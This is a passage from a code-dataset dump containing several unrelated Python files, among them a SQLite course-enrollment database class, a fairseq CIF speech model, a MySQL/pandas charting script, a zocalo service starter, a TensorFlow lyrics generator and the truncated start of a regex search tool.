conn.close()\n\n def select_student(self, email):\n \"\"\"Queries db for student information\n\n Args:\n email (str): Email to search\n\n Returns:\n Tuple: Information of requested student\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT * FROM students WHERE email=?\", (email,)\n ) # need the comma after email, to return the tuple, otherwise it will return a single index\n return cursor.fetchone()\n\n def select_instructor(self, email):\n \"\"\"Queries db for instructor information\n\n Args:\n email (str): Email to search\n\n Returns:\n Tuple: Information of requsted instructor\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\"SELECT * FROM instructors WHERE email=?\", (email,))\n return cursor.fetchone()\n\n def select_courses_count(self):\n \"\"\"Queries db for count of all courses\n\n Returns:\n Tuple: Integer count of courses\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT COUNT (*) FROM courses\"\n ) # count to return the number of courses\n return cursor.fetchone()\n\n def select_course_subject_count(self, subject):\n \"\"\"Queries db for the count of courses of a subject\n\n Args:\n subject (str): Course abbreviation to search\n\n Returns:\n Tuple: Integer count of courses\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\"SELECT COUNT (*) FROM courses WHERE subject=?\", (subject,))\n return cursor.fetchone()\n\n def select_course_title_count(self, title):\n \"\"\"Queries db for the count of courses of a subject\n\n Args:\n subject (str): Course abbreviation to search\n\n Returns:\n Tuple: Integer count of courses\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT COUNT (*) FROM courses WHERE course_title=?\", (title,)\n )\n return cursor.fetchone()\n\n def select_course(self, subject, course_num):\n \"\"\"Queries db for course information\n\n Args:\n subject (str): The subject abbreviation to search\n course_num (int): The course number to search\n\n Returns:\n Tuple: Course information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"SELECT * FROM courses WHERE (subject=? AND course_num=?)\",\n (subject, course_num),\n )\n return cursor.fetchone()\n\n def select_all_sections(self, course_id):\n \"\"\"Queries db for all sections of a course\n\n Args:\n course_id (int): course id to search\n\n Returns:\n List: All section information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT * FROM course_sections \n WHERE course_id = ?\"\"\",\n (course_id,),\n )\n return cursor.fetchall()\n\n def select_course_enrollment(self, student_id):\n \"\"\"Queries db for course enrollment of a student, returns the id values\n for student, course, section, and the grade and term\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n List: List of tuples containg course enrollment information\n\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT * FROM course_enrollments WHERE student_id = ?\"\"\",\n (student_id,),\n )\n return cursor.fetchall()\n\n def select_student_enrollment_detailed(self, student_id):\n \"\"\"Queries db for detailed enrollment of a student.\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n List: List of tuples containg course enrollment information\n\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.course_id, c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN course_enrollments ce\n ON ce.course_section_id = cs.course_section_id AND ce.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE ce.student_id = ?\"\"\",\n (student_id,),\n )\n return cursor.fetchall()\n\n def select_student_enrollment_schedule(self, student_id):\n \"\"\"Queries db for a students schedule\n\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n Tuple: List of tuples containf the days, start time and end time\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT cs.schedule_days, cs.start_time, cs.end_time\n FROM course_enrollments ce\n JOIN course_sections cs\n ON cs.course_id = ce.course_id AND cs.course_section_id = ce.course_section_id\n WHERE ce.student_id = ?\n \"\"\",\n (student_id,),\n )\n return cursor.fetchall()\n\n def select_course_detail(self, course_id, course_section_id):\n \"\"\"Queries db for a detailed desctription of a course section. Provides subject\n course number, title, section id, days, time, instructor name.\n\n Args:\n course_id (int): Course id to search\n course_section_id (int): Section id to search\n\n Returns:\n Tuple: Tuple containg the detailed information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE c.course_id = ? AND cs.course_section_id = ?\"\"\",\n (course_id, course_section_id),\n )\n return cursor.fetchone()\n\n def select_course_enrollment_count(self, student_id):\n \"\"\"Queries the database for the number of courses a student is enrolled\n\n Args:\n student_id (int): Student id to search\n\n Returns:\n Tuple: Tuple containg the count\n \"\"\"\n\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT COUNT (*) FROM course_enrollments WHERE student_id = ?\"\"\",\n (student_id,),\n )\n return cursor.fetchone()\n\n def select_course_detail_by_subject(self, subject):\n \"\"\"Queries the database for detailed course information from the course subject\n\n Args:\n subject (str): Subject to search\n\n Returns:\n Tuple: Tuple containing the detailed course information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.course_id, c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE c.subject LIKE ?\n \"\"\",\n (subject,),\n )\n return cursor.fetchall()\n\n def select_course_detail_by_title(self, title):\n \"\"\"Queries the database for detailed course information from the course title\n\n Args:\n subject (str): Subject to search\n\n Returns:\n Tuple: Tuple containing the detailed course information\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT \n c.course_id, c.subject, c.course_num, c.course_title,\n cs.course_section_id, cs.schedule_days, cs.start_time, cs.end_time,\n i.first_name || ' ' || i.last_name AS 'Instructor Name', c.course_units\n FROM courses c\n JOIN course_sections cs\n ON c.course_id = cs.course_id\n JOIN instructors i\n ON cs.instructor_id = i.instructor_id\n WHERE c.course_title LIKE ?;\n \"\"\",\n (title,),\n )\n return cursor.fetchall()\n\n def insert_course_enrollment(self, student_id, course_id, course_section_id):\n \"\"\"Inserts a new enrollment into the database\n\n Args:\n student_id (int): Id of student registering\n course_id (int): Id of course to be registered\n course_section_id (int): Id of course section to be registered\n\n Returns:\n int: 1 if INSERT succeeds, -1 if INSERT fails\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n INSERT INTO course_enrollments ('student_id', 'course_id', 'course_section_id') VALUES\n (?,?,?)\"\"\",\n (student_id, course_id, course_section_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1\n\n def select_section_schedule(self, course_id, course_section_id):\n \"\"\"Queries db for a sections schedule\n\n\n Args:\n course_id (int): Course id to search\n course_secton_id (int): Course section id to search\n\n Returns:\n Tuple: List of tuples containing the days, start time and end time\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n with conn:\n cursor.execute(\n \"\"\"SELECT cs.schedule_days, cs.start_time, cs.end_time\n FROM course_sections cs\n WHERE cs.course_id = ? AND cs.course_section_id = ?\n \"\"\",\n (course_id, course_section_id),\n )\n return cursor.fetchone()\n\n def update_course_enrollment(self, student_id, course_id, course_section_id, term):\n \"\"\"Updates an enrollment in the database\n\n Args:\n student_id (int): Id of student registering\n course_id (int): Id of course to be registered\n course_section_id (int): Id of course section to be registered\n term (str): Term of enrollment\n\n Returns:\n int: 1 if UPDATE succeeds, -1 if INSERT fails\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n UPDATE course_enrollments\n SET course_id = ?, course_section_id = ?\n WHERE student_id = ?\n (?,?,?)\"\"\",\n (course_id, course_section_id, student_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1\n\n def delete_course_enrollment(self, student_id, course_id, course_section_id, term):\n \"\"\"Deletes an enrollment in the database\n\n Args:\n student_id (int): Id of student registering\n course_id (int): Id of course to be registered\n course_section_id (int): Id of course section to be registered\n term (str): Term of enrollment\n\n Returns:\n int: 1 if DELETE succeeds, -1 if INSERT fails\n \"\"\"\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n DELETE FROM course_enrollments\n WHERE student_id = ?, course_id = ?, course_section_id = ?, term = ?\n (?,?,?,?)\"\"\",\n (student_id, course_id, course_section_id, term),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1\n\n\nif __name__ == \"__main__\":\n db = DB(\"enrollmentsystem.db\")\n db.execute_script_from_file(\"enrollmentsystem.db.sql\")\n","sub_path":"data/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":15383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"164777040","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\nimport copy\nimport math\nimport numpy as np\nfrom typing import Dict, List, Optional, Tuple\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import Tensor\n\nfrom fairseq.models.fairseq_encoder import EncoderOut\nfrom fairseq import utils, checkpoint_utils, tasks\nfrom fairseq.models import (\n BaseFairseqModel,\n FairseqEncoder,\n FairseqEncoderDecoderModel,\n register_model,\n register_model_architecture,\n)\nfrom fairseq.modules import (\n LayerNorm,\n TransposeLast,\n Fp32LayerNorm,\n FairseqDropout,\n Fp32GroupNorm\n)\nfrom .wav2vec2_ctc import add_common_args, Wav2VecEncoder, Linear, base_architecture\n\nPAD_IDX = 1\nEOS_IDX = 2\neps = 1e-7\nTHRESHOLD = 0.999\n\n\ndef add_cif_args(parser):\n parser.add_argument(\"--lambda-qua\", type=float, metavar=\"D\", help=\"lambda-qua\")\n parser.add_argument(\"--lambda-alpha\", type=float, metavar=\"D\", help=\"lambda-alpha\")\n\n\n@register_model(\"wav2vec_cif_fc\")\nclass CIFFcModel(BaseFairseqModel):\n def __init__(self, args, encoder, decoder):\n super().__init__()\n self.args = args\n self.encoder = encoder\n self.decoder = decoder\n\n @staticmethod\n def add_args(parser):\n add_common_args(parser)\n add_cif_args(parser)\n\n @classmethod\n def build_model(cls, args, task):\n \"\"\"Build a new model instance.\"\"\"\n\n cif_architecture(args)\n\n if not hasattr(args, \"max_source_positions\"):\n args.max_source_positions = 2048\n if not hasattr(args, \"max_target_positions\"):\n args.max_target_positions = 2048\n\n tgt_dict = task.target_dictionary\n\n encoder = cls.build_encoder(args)\n decoder = cls.build_decoder(args, encoder.d, tgt_dict)\n\n return cls(args, encoder, decoder)\n\n @classmethod\n def build_encoder(cls, args):\n return Wav2VecEncoder(args)\n\n @classmethod\n def build_decoder(cls, args, input_dim, tgt_dict):\n return FCDecoder(args, input_dim, tgt_dict)\n\n def forward(self, **kwargs):\n encoder_output = self.encoder(tbc=False, **kwargs)\n alphas = self.get_alphas(encoder_output)\n if self.training:\n _alphas, num_output = self.resize(alphas, kwargs['target_lengths'])\n else:\n _alphas, num_output = self.resize(alphas)\n cif_outputs = self.cif(encoder_output, _alphas)\n\n if self.training and cif_outputs.abs().sum(-1).ne(0).sum() != kwargs['target_lengths'].sum():\n print('_alphas:\\t', _alphas.sum(-1))\n print('alphas:\\t', alphas.sum(-1))\n print('target:\\t', kwargs['target_lengths'])\n import pdb; pdb.set_trace()\n\n logits = self.decoder(cif_outputs)\n\n return {'logits': logits, 'len_logits': kwargs['target_lengths'],\n 'alphas': alphas, 'num_output': num_output}\n\n @staticmethod\n def get_alphas(encoder_output):\n padding_mask = encoder_output['padding_mask']\n\n if 'encoded' in encoder_output.keys():\n alphas = encoder_output['encoded'][:, :, -1]\n else:\n alphas = encoder_output['encoder_out'][:, :, -1]\n\n alphas = torch.sigmoid(alphas)\n alphas = alphas * (~padding_mask).float()\n\n return alphas\n\n def get_normalized_probs(self, net_output, log_probs):\n \"\"\"Get normalized probabilities (or log probs) from a net's output.\"\"\"\n\n logits = net_output[\"logits\"]\n if log_probs:\n res = utils.log_softmax(logits.float(), dim=-1)\n else:\n res = utils.softmax(logits.float(), dim=-1)\n\n res.batch_first = True\n\n return res\n\n @staticmethod\n def cif(encoder_output, alphas, threshold=THRESHOLD, log=False):\n if type(encoder_output) is Tensor:\n hidden = encoder_output\n elif 'encoded' in encoder_output.keys():\n hidden = encoder_output['encoded']\n else:\n hidden = encoder_output['encoder_out']\n\n device = hidden.device\n B, T, H = hidden.size()\n\n # loop varss\n integrate = torch.zeros([B], device=device)\n frame = torch.zeros([B, H], device=device)\n # intermediate vars along time\n list_fires = []\n list_frames = []\n\n for t in range(T):\n alpha = alphas[:, t]\n distribution_completion = torch.ones([B], device=device) - integrate\n\n integrate += alpha\n list_fires.append(integrate)\n\n fire_place = integrate >= threshold\n integrate = torch.where(fire_place,\n integrate - torch.ones([B], device=device),\n integrate)\n cur = torch.where(fire_place,\n distribution_completion,\n alpha)\n remainds = alpha - cur\n\n frame += cur[:, None] * hidden[:, t, :]\n list_frames.append(frame)\n frame = torch.where(fire_place[:, None].repeat(1, H),\n remainds[:, None] * hidden[:, t, :],\n frame)\n\n if log:\n print('t: {}\\t{:.3f} -> {:.3f}|{:.3f} fire: {}'.format(\n t, integrate[log], cur[log], remainds[log], fire_place[log]))\n\n fires = torch.stack(list_fires, 1)\n frames = torch.stack(list_frames, 1)\n list_ls = []\n len_labels = torch.round(alphas.sum(-1)).int()\n max_label_len = len_labels.max()\n for b in range(B):\n fire = fires[b, :]\n l = torch.index_select(frames[b, :, :], 0, torch.where(fire >= threshold)[0])\n pad_l = torch.zeros([max_label_len - l.size(0), H], device=device)\n list_ls.append(torch.cat([l, pad_l], 0))\n\n if log:\n print(b, l.size(0))\n\n if log:\n print('fire:\\n', fires[log])\n print('fire place:\\n', torch.where(fires[log] >= threshold))\n\n return torch.stack(list_ls, 0)\n\n @staticmethod\n def resize(alphas, target_lengths, noise=0.0, threshold=THRESHOLD):\n \"\"\"\n alpha in thresh=1.0 | (0.0, +0.21)\n target_lengths: if None, apply round and resize, else apply scaling\n \"\"\"\n device = alphas.device\n # sum\n _num = alphas.sum(-1)\n\n num = target_lengths.float()\n num = num + noise * torch.rand(alphas.size(0)).to(device)\n\n # scaling\n _alphas = alphas * (num / _num)[:, None].repeat(1, alphas.size(1))\n\n # rm attention value that exceeds threashold\n while len(torch.where(_alphas > threshold)[0]):\n print('fixing alpha')\n xs, ys = torch.where(_alphas > threshold)\n for x, y in zip(xs, ys):\n if _alphas[x][y] >= threshold:\n mask = _alphas[x].ne(0).float()\n mean = 0.5 * _alphas[x].sum() / mask.sum()\n _alphas[x] = _alphas[x] * 0.5 + mean * mask\n\n return _alphas, _num\n\n\nclass FCDecoder(FairseqEncoder):\n \"\"\"\n Transformer decoder consisting of *args.decoder_layers* layers. Each layer\n is a :class:`TransformerDecoderLayer`.\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n dictionary (~dataload.Dictionary): decoding dictionary\n embed_tokens (torch.nn.Embedding): output embedding\n no_encoder_attn (bool, optional): whether to attend to encoder outputs\n (default: False).\n \"\"\"\n\n def __init__(self, args, input_dim, dictionary):\n super().__init__(dictionary)\n self.proj = Linear(input_dim, len(dictionary), bias=True)\n\n def forward(self, encoded):\n \"\"\"\n Args:\n encoder_out (Tensor): output from the encoder, used for\n encoder-side attention\n Returns:\n tuple:\n - the decoder's output of shape `(batch, tgt_len, vocab)`\n \"\"\"\n x = self.proj(encoded)\n return x\n\n\n@register_model_architecture(\"wav2vec_cif_fc\", \"wav2vec_cif_fc\")\ndef cif_architecture(args):\n args.lambda_qua = getattr(args, \"lambda_qua\", 0.05)\n args.lambda_alpha = getattr(args, \"lambda_alpha\", 0.1)\n base_architecture(args)\n","sub_path":"wav2vec/wav2vec2_cif.py","file_name":"wav2vec2_cif.py","file_ext":"py","file_size_in_byte":8368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135731852","text":"import pymysql\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters() #解决图表显示日期出现警告信息\n#连接MySQL数据库,指定密码(passwd)和数据库(db)\nconn = pymysql.connect(host = \"localhost\",user = 'root',passwd ='111',db = 'test',charset=\"utf8\")\nsql_query = 'SELECT * FROM test.user' #SQL查询语句\ndata = pd.read_sql(sql_query, con=conn) #读取MySQL数据\nconn.close() # 关闭数据库连接\ndata=data[['username','addtime']] #提取指定列数据\ndata.rename(columns = {'addtime':'注册日期','username':'用户数量'},inplace=True) #列重命名\ndata['注册日期'] = pd.to_datetime(data['注册日期']) #将数据类型转换为日期类型\ndata = data.set_index('注册日期') #将日期设置为索引\ndata=data['2018-04-01':'2018-04-30'] #提取指定日期数据\n#按天统计新注册用户\ndf=data.resample('D').size().to_period('D')\ndf.to_excel('result1.xlsx',index=False)# 导出数据为Excel文件\nx=pd.date_range(start='20180401', periods=30)\ny=df\n#绘制折线图\nsns.set_style('darkgrid')\nplt.rcParams['font.sans-serif']=['SimHei'] #解决中文乱码\nplt.title('新用户注册时间分布图') #图表标题\nplt.xticks(fontproperties = 'Times New Roman', size = 8,rotation=20)#X轴字体大小\nplt.plot(x,y)\nplt.xlabel('注册日期')\nplt.ylabel('用户数量')\nplt.show()","sub_path":"Python数据分析从入门到精通/MR/Code/11/data_new.py","file_name":"data_new.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"23680416","text":"#!usr/bin/python\n# coding:utf-8\n# Test input\nname = input('please input your name: ')\nprint('hello,', name)\n\nx = float(input(\"长方形的长:\"))\ny = float(input(\"长方形的宽:\"))\nprint(\"长方形的面积:\", x * y)\n# 输入字符串的时候会Error:NameError: name 'qwqe' is not defined\n# 输入数字的时候则会顺利执行\n# 原因:项目python版本不对,project interpreter里面改正版本\n# 另,在python2里面输入字符串是raw_input() input()接收其他类型。python3中统一为input(),接收string类型,其他类型需要转型\n","sub_path":"learnPython/输入输出/Test_Input.py","file_name":"Test_Input.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340180498","text":"#\n# dlstbx.service\n# Starts a workflow service\n#\n\n# Note that the call semantics of dlstbx.service differs from other dlstbx\n# commands. dlstbx.service defaults to running in the testing ActiveMQ\n# namespace (zocdev), rather than the live namespace (zocalo). This is to\n# stop servers started by developers on their machines accidentally interfering\n# with live data processing.\n# To run a live server you must specify '--live'\n\n\nfrom __future__ import absolute_import, division, print_function\n\nimport logging\nimport os\nimport sys\n\nimport dlstbx.util\nimport workflows\nimport workflows.contrib.start_service\nimport workflows.logging\nfrom dlstbx import enable_graylog\nfrom dlstbx.util.colorstreamhandler import ColorStreamHandler\nfrom dlstbx.util.version import dlstbx_version\n\nimport workflows.services # To add Hack to he service, but this should be done through setup.py, Please see bellow\nfrom motioncorr2 import Motioncor2Runner\nfrom clear_motioncor2queue import Motioncor2RunnerClearQueue\n\nclass DLSTBXServiceStarter(workflows.contrib.start_service.ServiceStarter):\n __frontendref = None\n use_live_infrastructure = False\n\n def __init__(self):\n # initialize logging\n self.setup_logging()\n\n self.log.debug('Loading dlstbx workflows plugins')\n\n dlstbx = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n self.log.debug('Loading dlstbx credentials')\n\n # change settings when in live mode\n default_configuration = '/dls_sw/apps/zocalo/secrets/credentials-testing.cfg'\n if '--live' in sys.argv:\n self.use_live_infrastructure = True\n default_configuration = '/dls_sw/apps/zocalo/secrets/credentials-live.cfg'\n\n # override default stomp host\n from workflows.transport.stomp_transport import StompTransport\n try:\n StompTransport.load_configuration_file(default_configuration)\n except workflows.Error as e:\n self.log.warning(e)\n\n def setup_logging(self):\n '''Initialize common logging framework. Everything is logged to central\n graylog server. Depending on setting messages of DEBUG or INFO and higher\n go to console.'''\n logger = logging.getLogger()\n logger.setLevel(logging.WARN)\n\n # Enable logging to console\n self.console = ColorStreamHandler()\n self.console.setLevel(logging.INFO)\n logger.addHandler(self.console)\n\n # logging.getLogger('stomp.py').setLevel(logging.DEBUG)\n logging.getLogger('workflows').setLevel(logging.INFO)\n logging.getLogger('scipion').setLevel(logging.INFO)\n\n self.log = logging.getLogger('dlstbx.service')\n self.log.setLevel(logging.DEBUG)\n\n # Enable logging to graylog\n enable_graylog()\n\n def on_parser_preparation(self, parser):\n parser.add_option(\"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\",\n default=False, help=\"Show debug output\")\n parser.add_option(\"--tag\", dest=\"tag\", metavar=\"TAG\", default=None,\n help=\"Individual tag related to this service instance\")\n parser.add_option(\"-d\", \"--debug\", dest=\"debug\", action=\"store_true\",\n default=False, help=\"Set debug log level for workflows\")\n parser.add_option(\"-r\", \"--restart\", dest=\"service_restart\", action=\"store_true\",\n default=False, help=\"Restart service on failure\")\n parser.add_option(\"--test\", action=\"store_true\", dest=\"test\",\n help=\"Run in ActiveMQ testing namespace (zocdev, default)\")\n parser.add_option(\"--live\", action=\"store_true\", dest=\"test\",\n help=\"Run in ActiveMQ live namespace (zocalo)\")\n self.log.debug('Launching ' + str(sys.argv))\n\n def on_parsing(self, options, args):\n if options.verbose:\n self.console.setLevel(logging.DEBUG)\n logging.getLogger('dials').setLevel(logging.DEBUG)\n logging.getLogger('dlstbx').setLevel(logging.DEBUG)\n logging.getLogger('xia2').setLevel(logging.DEBUG)\n if options.debug:\n logging.getLogger('workflows').setLevel(logging.DEBUG)\n self.options = options\n\n def before_frontend_construction(self, kwargs):\n kwargs['verbose_service'] = True\n kwargs['environment'] = kwargs.get('environment', {})\n kwargs['environment']['live'] = self.use_live_infrastructure\n return kwargs\n\n def on_frontend_preparation(self, frontend):\n self.log.info('Attaching ActiveMQ logging to transport')\n\n def logging_call(record):\n if frontend._transport.is_connected():\n try:\n record = record.__dict__['records']\n except:\n record = record.__dict__\n frontend._transport.broadcast('transient.log', record)\n\n amq_handler = workflows.logging.CallbackHandler(logging_call)\n if not self.options.verbose:\n amq_handler.setLevel(logging.INFO)\n logging.getLogger().addHandler(amq_handler)\n\n if self.options.service_restart:\n frontend.restart_service = True\n\n extended_status = {}\n if self.options.tag:\n extended_status['tag'] = self.options.tag\n for env in ('SGE_CELL', 'JOB_ID'):\n if env in os.environ:\n extended_status['cluster_' + env] = os.environ[env]\n extended_status['dlstbx'] = dlstbx_version()\n\n original_status_function = frontend.get_status\n\n def extend_status_wrapper():\n status = original_status_function()\n status.update(extended_status)\n status['mem-uss'] = dlstbx.util.get_process_uss()\n return status\n\n frontend.get_status = extend_status_wrapper\n\n\n# Hack to include the Motioncor2Runner in known_services\nworkflows.services.get_known_services()\nworkflows.services.get_known_services.cache['Motioncor2Runner'] = Motioncor2Runner\nworkflows.services.get_known_services.cache['Motioncor2RunnerClearQueue'] = Motioncor2RunnerClearQueue\n\n\nif __name__ == '__main__':\n DLSTBXServiceStarter().run(program_name='dlstbx.service',\n version=dlstbx_version(),\n transport_command_channel='command')\n\n","sub_path":"start_services.py","file_name":"start_services.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"278556368","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# Related url: https://github.com/tensorflow/examples/blob/master/courses/udacity_intro_to_tensorflow_for_deep_learning/l10c03_nlp_constructing_text_generation_model.ipynb\n# Generating some new lyrics from the trained model\n\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\n# Other imports for processing data\nimport string\nimport numpy as np\nimport pandas as pd\n\n# DATA PREPROCESSING\n# First to get the dataset of the Song Lyrics dataset on Kaggle by:\n# !wget --no-check-certificate \\\n# https://drive.google.com/uc?id=1LiJFZd41ofrWoBtW-pMYsfz1w8Ny0Bj8 \\\n# -O /tmp/songdata.csv\n\n# Then to generate a tokenizer with the songdata.csv\ndef tokenize_corpus(corpus, num_words=-1):\n # Fit a Tokenizer on the corpus\n if num_words > -1:\n tokenizer = Tokenizer(num_words=num_words)\n else:\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(corpus)\n return tokenizer\n\ndef create_lyrics_corpus(dataset, field):\n # Remove all other punctuation\n dataset[field] = dataset[field].str.replace('[{}]'.format(string.punctuation), '')\n # Make it lowercase\n dataset[field] = dataset[field].str.lower()\n # Make it one long string to split by line\n lyrics = dataset[field].str.cat()\n corpus = lyrics.split('\\n')\n # Remove any trailing whitespace\n for l in range(len(corpus)):\n corpus[l] = corpus[l].rstrip()\n # Remove any empty lines\n corpus = [l for l in corpus if l != '']\n\n return corpus\n\n# Read the dataset from csv\ndataset = pd.read_csv('/tmp/songdata.csv', dtype=str)\n# Create the corpus using the 'text' column containing lyrics\ncorpus = create_lyrics_corpus(dataset, 'text')\n# Tokenize the corpus\ntokenizer = tokenize_corpus(corpus)\n\n# Get the uniform input length (max_sequence_len) of the model\nmax_sequence_len=0\nfor line in corpus:\n token_list = tokenizer.texts_to_sequences([line])[0]\n max_sequence_len=max(max_sequence_len,len(token_list))\n\n# Load the saved model which is trained on the Song Lyrics dataset\nmodel=tf.keras.models.load_model(\"path/to/model\")\n\n# Generate new lyrics with some \"seed text\"\nseed_text = \"im feeling chills\" # seed text can be customerized\nnext_words = 100 # this defined the length of the new lyrics\n\nfor _ in range(next_words):\n token_list = tokenizer.texts_to_sequences([seed_text])[0] # convert the seed text to ndarray\n token_list = pad_sequences([token_list], maxlen=max_sequence_len - 1, padding='pre') # pad the input for equal length\n predicted = np.argmax(model.predict(token_list), axis=-1) # get the predicted word index\n output_word = \"\"\n for word, index in tokenizer.word_index.items():\n if index == predicted:\n output_word = word\n break\n seed_text += \" \" + output_word # add the predicted word to the seed text\nprint(seed_text)\n","sub_path":"python/serving/example/l10c03_nlp_constructing_text_generation_model.py","file_name":"l10c03_nlp_constructing_text_generation_model.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"256688034","text":"\"\"\"\nImplement a Python script, that searches for lines matching regular expression -r (--regex) in file/s -f (--files).\nUse STDIN if file/s option wasn’t provided.\nAssume that input is ASCII, you don't need to deal with a different encoding.\nIf a line matches, print it. Please print the file name and the line number for every match.\nThe script accepts list optional parameters which are mutually exclusive:\n-u ( --underscore ) which prints '^' under the matching text\n-c ( --color ) which highlight matching text [1]\n-m ( --machine ) which generate machine-readable output\nformat: file_name:no_line:start_pos:matched_text\nMultiple matches on a single line are allowed, without overlapping.\n\"\"\"\nimport re\nimport sys\nimport os\nimport glob\nimport argparse\nfrom functools import wraps\n\n\nclass SearchPattern:\n\n def __init__(self, files=None, regex=None, color=None, machine=None):\n self.__files = files\n self.__regex = regex\n self.__color = color\n self.__machine = machine\n\n @property\n def opts_val(self):\n \"\"\"\n Using @property decorator to achieve getters and setters behaviour (encapsulate the CL options)\n \"\"\"\n return self.__files, self.__regex, self.__color, self.__machine\n\n @opts_val.setter\n def opts_val(self, *args):\n \"\"\"\n Setter func\n \"\"\"\n self.__files = args[0]\n self.__regex = args[1]\n self.__color = args[2]\n self.__machine = args[3]\n\n @staticmethod\n def wrapper_color(func):\n \"\"\"\n returns a function that take single arg, a Wrapper function\n to Decorate the color_pattern func.\n It can be extended for multiple colors patterns highlight\n \"\"\"\n\n @wraps(func)\n def surround_value(word):\n \"\"\"\n A class of Color can be created for variety of color to highlight the pattern\n \"\"\"\n end = '\\x1b[0m'\n color = '\\x1b[4;34;41m'\n return '{}{}{}'.format(color, word, end)\n return surround_value\n\n @staticmethod\n def color_the_pattern(line, regex, color_word):\n \"\"\"\n This to print colored pattern in output, with -c option on command line\n it takes a line, regex and wrapper func(decorator) as argument which should be colored\n \"\"\"\n result = ''\n for word in line.split():\n if regex in word:\n re_pos = re.search(regex, word)\n re_start = re_pos.start()\n re_end = re_pos.end()\n start = word[0:re_start]\n word_color = word[re_start:re_end]\n end = word[re_end:]\n result += start + ' 